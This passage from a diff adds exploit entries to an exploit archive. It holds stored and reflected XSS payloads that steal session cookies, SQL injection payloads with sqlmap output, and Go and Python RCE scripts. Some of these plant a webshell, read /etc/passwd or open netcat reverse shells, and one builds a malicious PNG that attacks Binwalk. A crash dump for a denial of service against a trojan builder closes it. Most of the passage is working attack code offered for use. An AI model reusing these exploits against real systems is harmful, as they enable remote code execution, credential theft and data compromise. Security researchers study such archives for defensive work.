+ + + +The XSS will be triggered when viewing the related event \ No newline at end of file diff --git a/exploits/php/webapps/51242.txt b/exploits/php/webapps/51242.txt new file mode 100644 index 000000000..05a4bcacd --- /dev/null +++ b/exploits/php/webapps/51242.txt @@ -0,0 +1,27 @@ +# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) +# Date: 2021-09-17 +# Exploit Author: Matteo Conti - https://deltaspike.io +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip +# Version: 1.0 +# Tested on: Ubuntu 18.04 - LAMP + +# Description +The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message, +maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it. + + +# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message) + +# Tested Payload: :/?'+document.cookie> + +# Prof of concept: + +- From /contact.php, send a message containing the following payload in "title" or "message" fields: + +:/?'+document.cookie> +(the first url have to be an existing image) + +- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php + +- Your listener will receive the PHP session id. \ No newline at end of file diff --git a/exploits/php/webapps/51245.txt b/exploits/php/webapps/51245.txt new file mode 100644 index 000000000..528208b79 --- /dev/null +++ b/exploits/php/webapps/51245.txt @@ -0,0 +1,74 @@ +## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) +## Author: nu11secur1ty +## Date: 01.31.2023 +## Vendor: https://bgerp.com/Bg/Za-sistemata +## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31 +## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based + +## Description: +The bgERP system suffers from unsecured login cookies in which cookies +are stored as very sensitive login and also login session information! +The attacker can trick the already login user and can steal the +already generated cookie from the system and can do VERY DANGEROUS +things with the already stored sensitive information. +This can be very expensive for all companies which are using this +system, please be careful! +Also, this system has a vulnerable search parameter for XSS-Reflected attacks! + +## STATUS: HIGH Vulnerability + +[+] Exploit: + +```GET +GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 +HTTP/1.1 +Host: 192.168.100.77:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.100.77:8080/Portal/Show +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0 +Connection: close +Content-Length: 0 +``` + +[+] Response after logout of the system: +```HTTP +HTTP/1.1 302 Found +Date: Tue, 31 Jan 2023 15:13:26 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: 0 +Cache-Control: no-cache, must-revalidate +Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472 +Connection: close +Content-Length: 2 +Content-Encoding: none +Content-Type: text/html; charset=UTF-8 + +OK +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected) + +## Proof and Exploit: +[href](https://streamable.com/xhffdu) + +## Time spent +`01:30:00` + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51246.txt b/exploits/php/webapps/51246.txt new file mode 100644 index 000000000..3ff9e421e --- /dev/null +++ b/exploits/php/webapps/51246.txt @@ -0,0 +1,76 @@ +# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) +# Date: 2023-01-02 +# Exploit Author: Muhammad Navaid Zafar Ansari +# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip +# Version: 1.0 +# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian) +# CVE: Not Assigned Yet +# References: - + +------------------------------------------------------------------------------------ + +1. Description: +---------------------- + +Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +2. Proof of Concept: +---------------------- + +Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection. +Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql + +SQLMap Response: + +[*] starting @ 04:49:58 /2023-02-01/ + +[04:49:58] [INFO] testing connection to the target URL +you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK +--- +[04:50:00] [INFO] testing MySQL +[04:50:00] [INFO] confirming MySQL +[04:50:00] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Debian +web application technology: Apache 2.4.55, PHP +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) + + +3. Example payload: +---------------------- + +(boolean-based) + +' AND 1=1 AND 'test'='test + + +4. Burpsuite request: +---------------------- + +GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1 +Host: localhost +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51250.go b/exploits/php/webapps/51250.go new file mode 100755 index 000000000..71d5f7fe8 --- /dev/null +++ b/exploits/php/webapps/51250.go @@ -0,0 +1,65 @@ +// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) +// Date: 2023-02-02 +// Exploit Author: Mayank Deshmukh +// Vendor Homepage: https://centos-webpanel.com/ +// Affected Versions: version < 0.9.8.1147 +// Tested on: Kali Linux +// CVE : CVE-2022-44877 +// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7 + +// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020 + +package main + +import ( + "bytes" + "crypto/tls" + "fmt" + "net/http" + "flag" + "time" +) + +func main() { + + var host,call string + flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)") + flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)") + + flag.Parse() + + banner := ` +-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =- +- by Mayank Deshmukh (ColdFusionX) + +` + fmt.Printf(banner) + fmt.Println("[*] Triggering cURL command") + + fmt.Println("[*] Open Listener on " + call + "") + + //Skip certificate validation + tr := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + client := &http.Client{Transport: tr} + + // Request URL + url := host + "/login/index.php?login=$(curl${IFS}" + call + ")" + + // Request body + body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login")) + + // Create HTTP client and send POST request + req, err := http.NewRequest("POST", url, body) + req.Header.Add("Content-Type", "application/x-www-form-urlencoded") + resp, err := client.Do(req) + if err != nil { + fmt.Println("Error sending request:", err) + return + } + time.Sleep(2 * time.Second) + + defer resp.Body.Close() + fmt.Println("\n[*] Check Listener for OOB callback") +} \ No newline at end of file diff --git a/exploits/php/webapps/51251.py b/exploits/php/webapps/51251.py new file mode 100755 index 000000000..0cc292b70 --- /dev/null +++ b/exploits/php/webapps/51251.py @@ -0,0 +1,158 @@ +# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE) +# Date: 02-Feb-2023 +# Exploit Author: Galoget Latorre (@galoget) +# Vendor Homepage: https://responsivefilemanager.com +# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip +# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604 +# Version: 9.9.5 +# Language: Python 3.x +# Tested on: +# - Ubuntu 22.04.5 LTS 64-bit +# - Debian GNU/Linux 10 (buster) 64-bit +# - Kali GNU/Linux 2022.3 64-bit +# CVE: CVE-2022-46604 (Konstantin Burov) + + +#!/usr/bin/python3 +# -*- coding:utf-8 -*- + +import sys +import requests +from bs4 import BeautifulSoup +from termcolor import colored, cprint + + +# Usage: python3 exploit.py +# Example: python3 exploit.py 127.0.0.1 + + +def banner(): + """ + Function to print the banner + """ + + banner_text = """ + _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ +| | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | | +| --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ | +|_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_| + +File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE) +Exploit Author: Galoget Latorre (@galoget) +CVE Author: Konstantin Burov +""" + print(banner_text) + + +def usage_instructions(): + """ + Function that validates the number of arguments. + The aplication MUST have 2 arguments: + - [0]: Name of the script + - [1]: Target site, which can be a domain or an IP Address + """ + if len(sys.argv) != 2: + print("Usage: python3 exploit.py ") + print("Example: python3 exploit.py 127.0.0.1") + sys.exit(0) + + +def run_command(web_session, webshell_url, command_to_run): + """ + Function that: + - Interacts with the webshell to run a command + - Cleans the response of the webshell + - Returns the response object and the output of the command + """ + webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers) + command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser') + return (webshell_response, command_output_soup.find('pre').text) + + +if __name__ == "__main__": + banner() + usage_instructions() + + # Change this with the domain or IP address to attack + if sys.argv[1]: + host = sys.argv[1] + else: + host = "127.0.0.1" + + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', + } + + + # URL to create a new file + target_url = f"http://{host}/filemanager/execute.php?action=create_file" + + # Change this to customize the payload (i.e. The content of the malicious file that will be created) + payload = "
\">
" + # oneliner_payload = " " + + # URL to get a PHPSESSID value + cookie_url = f"http://{host}/filemanager/dialog.php" + + # New Session + session = requests.Session() + + # GET request to retrieve a PHPSESSID value + cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue") + try: + session.get(url = cookie_url, headers = headers) + except: + cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red") + sys.exit(0) + + if session.cookies.get_dict(): + cprint("[+] PHPSESSID retrieved correctly.", "green") + cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow") + else: + cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red") + + # Params, rename if you want + params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload} + + # POST request to create the webshell + cprint(f"\n[*] Attempting to create a webshell on {host}", "blue") + response = session.post(url = target_url, headers = headers, data = params) + + # If the status code and the message match, we may have a webshell inside. ;) + if response.status_code == 200 and response.text == "File successfully saved.": + # Default webshell path + shell_url = f"http://{host}/source/shell.php" + + # Verify if the shell was uploaded by running whoami and cat /etc/passwd + webshell, whoami_output = run_command(session, shell_url, "whoami") + webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd") + + # Common users when getting a webshell + common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"] + + # Verify if the command was executed correctly + if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output: + cprint("[+] Webshell uploaded - Enjoy!", "green") + cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow") + cprint(f"[+] Running `whoami` command: {whoami_output}", "green") + + + # Ask to enter into a pseudo-interactive mode with the webshell + answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta")) + + if answer.upper() == "Y": + cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue") + command = "" + while command != "exit": + command = input(colored(">> ", "cyan")).lower() + webshell, command_output = run_command(session, shell_url, command) + if command != "exit": + cprint(command_output, "cyan") + + cprint("\n[*] Exiting...Bye!", "blue") + + elif response.status_code == 403 and response.text == "The file is already existing": + cprint("[-] The file that you're trying to create is already on the server.", "red") + + else: + cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red") \ No newline at end of file diff --git a/exploits/php/webapps/51253.txt b/exploits/php/webapps/51253.txt new file mode 100644 index 000000000..8d3fcd27a --- /dev/null +++ b/exploits/php/webapps/51253.txt @@ -0,0 +1,13 @@ +# Exploit Title: itech TrainSmart r1044 - SQL injection +# Date: 03.02.2023 +# Exploit Author: Adrian Bondocea +# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/ +# Version: TrainSmart r1044 +# Tested on: Linux +# CVE : CVE-2021-36520 + +SQL injection vulnerability in itech TrainSmart r1044 allows remote +attackers to view sensitive information via crafted command using sqlmap. + +PoC: +sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs \ No newline at end of file diff --git a/exploits/php/webapps/51260.txt b/exploits/php/webapps/51260.txt new file mode 100644 index 000000000..34ba9b535 --- /dev/null +++ b/exploits/php/webapps/51260.txt @@ -0,0 +1,29 @@ +# Exploit Title: CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) +# Google Dork: N/A +# Date: February 09, 2023 +# Exploit Author: Manish Pathak +# Vendor Homepage: https://cksource.com/ +# Software Link: https://ckeditor.com/ckeditor-5/download/ +# Version: 35.4.0 +# Tested on: Linux / Web +# CVE : CVE-2022-48110 + + + +CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via Full Featured CKEditor5 Widget as the editor fails to sanitize user provided data. + +An attacker can execute arbitrary script in the browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +CKEditor5 version 35.4.0 is tested & found to be vulnerable. + +Documentation avaiable at https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#security + +Security Docs Says """The HTML embed feature does not currently execute code in + \ No newline at end of file diff --git a/exploits/php/webapps/51261.txt b/exploits/php/webapps/51261.txt new file mode 100644 index 000000000..f69d210ea --- /dev/null +++ b/exploits/php/webapps/51261.txt @@ -0,0 +1,14 @@ +# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read +# Google Dork: N/A +# Date: 06/02/2023 +# Exploit Author: Cristian 'void' Giustini +# Vendor Homepage: https://imagemagick.org/ +# Software Link: https://imagemagick.org/ +# Version: <= 7.1.0-49 +# Tested on: 7.1.0-49 and 6.9.11-60 +# CVE : CVE-2022-44268 (CVE Owner: Metabase Q Team +https://www.metabaseq.com/imagemagick-zero-days/) +# Exploit pre-requirements: Rust + + +# PoC : https://github.com/voidz0r/CVE-2022-44268 \ No newline at end of file diff --git a/exploits/php/webapps/51263.py b/exploits/php/webapps/51263.py new file mode 100755 index 000000000..3d3a78511 --- /dev/null +++ b/exploits/php/webapps/51263.py @@ -0,0 +1,139 @@ +#!/usr/bin/python3 + +# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE) +# Date: 2023-01-08 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2023-0315 +# Vendor Homepage: https://froxlor.org/ +# Version: v2.0.3 +# Tested on: Ubuntu 20.04 / PHP 8.2 + +import telnetlib +import requests +import socket +import sys +import warnings +import random +import string +from bs4 import BeautifulSoup +from urllib.parse import quote +from threading import Thread + +warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') + + +if len(sys.argv) !=3D 6: + print("[~] Usage : ./froxlor-rce.py url username password ip port") + exit() + +url =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D sys.argv[5] + +request =3D requests.session() + +def login(): + login_info =3D { + "loginname": username, + "password": password, + "send": "send", + "dologin": "" + } + login_request =3D request.post(url+"/index.php", login_info, allow_redi= +rects=3DFalse) + login_headers =3D login_request.headers + location_header =3D login_headers["Location"] + if location_header =3D=3D "admin_index.php": + return True + else: + return False + + +def change_log_path(): + change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part= +=3Dlogging" + csrf_token_req =3D request.get(change_log_path_url) + csrf_token_req_response =3D csrf_token_req.text + soup =3D BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) + print("[+] Main CSRF token retrieved %s" % csrf_token) + + multipart_data =3D { + + "logger_enabled": (None, "0"), + "logger_enabled": (None, "1"), + "logger_severity": (None, "2"), + "logger_logtypes[]": (None, "file"), + "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f= +ooter.html.twig"), + "logger_log_cron": (None, "0"), + "csrf_token": (None, csrf_token), + "page": (None, "overview"), + "action": (None, ""), + "send": (None, "send") + =20 + } + req =3D request.post(change_log_path_url, files=3Dmultipart_data) + response =3D req.text + if "The settings have been successfully saved." in response: + print("[+] Changed log file path!") + return True + else: + return False + + +def inject_template(): + admin_page_path =3D url + "/admin_index.php" + csrf_token_req =3D request.get(admin_page_path) + csrf_token_req_response =3D csrf_token_req.text + soup =3D BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) + onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} = +{1} >/tmp/f".format(ip, port) + payload =3D "{{['%s']|filter('exec')}}" % onliner + data =3D { + "theme": payload, + "csrf_token": csrf_token, + "page": "change_theme", + "send": "send", + "dosave": "", + } + req =3D request.post(admin_page_path, data, allow_redirects=3DFalse) + try: + location_header =3D req.headers["Location"] + if location_header =3D=3D "admin_index.php": + print("[+] Injected the payload sucessfully!") + except: + print("[-] Can't Inject payload :/") + exit() + handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,)) + handler_thread.start() + print("[+] Triggering the payload ...") + req2 =3D request.get(admin_page_path) + + +def connection_handler(port): + print("[+] Listener started on port %s" % port) + t =3D telnetlib.Telnet() + s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", int(port))) + s.listen(1) + conn, addr =3D s.accept() + print("[+] Connection received from %s" % addr[0]) + t.sock =3D conn + print("[+] Heads up, incoming shell!!") + t.interact() + + + +if login(): + print("[+] Successfully Logged in!") + index_url =3D url + "/admin_index.php" + request.get(index_url) + if change_log_path(): + inject_template() + +else: + print("[-] Can't login") \ No newline at end of file diff --git a/exploits/python/remote/51249.py b/exploits/python/remote/51249.py new file mode 100755 index 000000000..22393de33 --- /dev/null +++ b/exploits/python/remote/51249.py @@ -0,0 +1,55 @@ +# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE) +# Exploit Author: Etienne Lacoche +# CVE-ID: CVE-2022-4510 +import os +import inspect +import argparse + +print("") +print("################################################") +print("------------------CVE-2022-4510----------------") +print("################################################") +print("--------Binwalk Remote Command Execution--------") +print("------Binwalk 2.1.2b through 2.3.2 included-----") +print("------------------------------------------------") +print("################################################") +print("----------Exploit by: Etienne Lacoche-----------") +print("---------Contact Twitter: @electr0sm0g----------") +print("------------------Discovered by:----------------") +print("---------Q. Kaiser, ONEKEY Research Lab---------") +print("---------Exploit tested on debian 11------------") +print("################################################") +print("") + +parser = argparse.ArgumentParser() +parser.add_argument("file", help="Path to input .png file",default=1) +parser.add_argument("ip", help="Ip to nc listener",default=1) +parser.add_argument("port", help="Port to nc listener",default=1) + +args = parser.parse_args() + +if args.file and args.ip and args.port: + header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e") + lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n'] + + in_file = open(args.file, "rb") + data = in_file.read() + in_file.close() + + with open("/tmp/plugin", "w") as f: + for line in lines: + f.write(line) + + with open("/tmp/plugin", "rb") as f: + content = f.read() + + os.system("rm /tmp/plugin") + + with open("binwalk_exploit.png", "wb") as f: + f.write(data) + f.write(header_pfs) + f.write(content) + + print("") + print("You can now rename and share binwalk_exploit and start your local netcat listener.") + print("") \ No newline at end of file diff --git a/exploits/windows/dos/51265.txt b/exploits/windows/dos/51265.txt new file mode 100644 index 000000000..cc46d2364 --- /dev/null +++ b/exploits/windows/dos/51265.txt @@ -0,0 +1,224 @@ +#Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS +# Exploit Author: TOUHAMI KASBAOUI +# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ +# Software Link: N/A# Version: 2.1# Tested on: Windows 10 +# CVE : N/A + +================================================================== +THE BUG : NULL pointer dereference -> DOS crash +================================================================== +The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control. +================================================================== +WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES +================================================================== +(160.b98): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c +eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc +cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246 +builder!XWorm.Client.isDisconnected+0xa9: +078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=???????? +******************************************************************************* +*                                                                             * +*                        Exception Analysis                                   * +*                                                                             * +******************************************************************************* + +MethodDesc:   055a86b4 +Method Name:  XWorm.Client.isDisconnected() +Class:        09fe9634 +MethodTable:  055a86d8 +mdToken:      06000730 +Module:       01464044 +IsJitted:     yes +CodeAddr:     078f59b0 +Transparency: Critical +MethodDesc:   055a86b4 +Method Name:  XWorm.Client.isDisconnected() +Class:        09fe9634 +MethodTable:  055a86d8 +mdToken:      06000730 +Module:       01464044 +IsJitted:     yes +CodeAddr:     078f59b0 +Transparency: Critical +Failed to request MethodData, not in JIT code range + +KEY_VALUES_STRING: 1 + +    Key  : AV.Dereference +    Value: NullPtr + +    Key  : AV.Fault +    Value: Read + +    Key  : Analysis.CPU.mSec +    Value: 6406 + +    Key  : Analysis.DebugAnalysisManager +    Value: Create + +    Key  : Analysis.Elapsed.mSec +    Value: 12344 + +    Key  : Analysis.IO.Other.Mb +    Value: 152 + +    Key  : Analysis.IO.Read.Mb +    Value: 3 + +    Key  : Analysis.IO.Write.Mb +    Value: 181 + +    Key  : Analysis.Init.CPU.mSec +    Value: 48905 + +    Key  : Analysis.Init.Elapsed.mSec +    Value: 6346579 + +    Key  : Analysis.Memory.CommitPeak.Mb +    Value: 200 + +    Key  : CLR.BuiltBy +    Value: NET48REL1LAST_C + +    Key  : CLR.Engine +    Value: CLR + +    Key  : CLR.Version +    Value: 4.8.4515.0 + +    Key  : Timeline.OS.Boot.DeltaSec +    Value: 7496 + +    Key  : Timeline.Process.Start.DeltaSec +    Value: 6371 + +    Key  : WER.OS.Branch +    Value: vb_release + +    Key  : WER.OS.Timestamp +    Value: 2019-12-06T14:06:00Z + +    Key  : WER.OS.Version +    Value: 10.0.19041.1 + +    Key  : WER.Process.Version +    Value: 2.1.0.0 + + +NTGLOBALFLAG:  0 + +PROCESS_BAM_CURRENT_THROTTLED: 0 + +PROCESS_BAM_PREVIOUS_THROTTLED: 0 + +APPLICATION_VERIFIER_FLAGS:  0 + +EXCEPTION_RECORD:  (.exr -1) +ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9) +   ExceptionCode: c0000005 (Access violation) +  ExceptionFlags: 00000000 +NumberParameters: 2 +   Parameter[0]: 00000000 +   Parameter[1]: 00000000 +Attempt to read from address 00000000 + +FAULTING_THREAD:  00000b98 + +PROCESS_NAME:  builder.exe + +READ_ADDRESS:  00000000 + +ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. + +EXCEPTION_CODE_STR:  c0000005 + +EXCEPTION_PARAMETER1:  00000000 + +EXCEPTION_PARAMETER2:  00000000 + +IP_ON_HEAP:  078f5a59 +The fault address in not in any loaded module, please check your build's rebase +log at \bin\build_logs\timebuild\ntrebase.log for module which may +contain the address if it were loaded. + +STACK_TEXT:   +0113e568 73140556     00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9 +0113e574 7314373a     0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34 +0113e5c8 7321f0d1     c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b +0113e608 7321f1d6     731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55 +0113e90c 7212853c     00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838 +0113e930 72114a9d     00000000 00000000 00000000 mscorlib_ni! +0113e94c 6e14bf55     00000000 00000000 00000000 mscorlib_ni! +0113e968 6e14be68     00000000 00000000 00000000 System_Windows_Forms_ni! +0113e990 72118604     00000000 00000000 00000000 System_Windows_Forms_ni! +0113e9f4 72118537     00000000 00000000 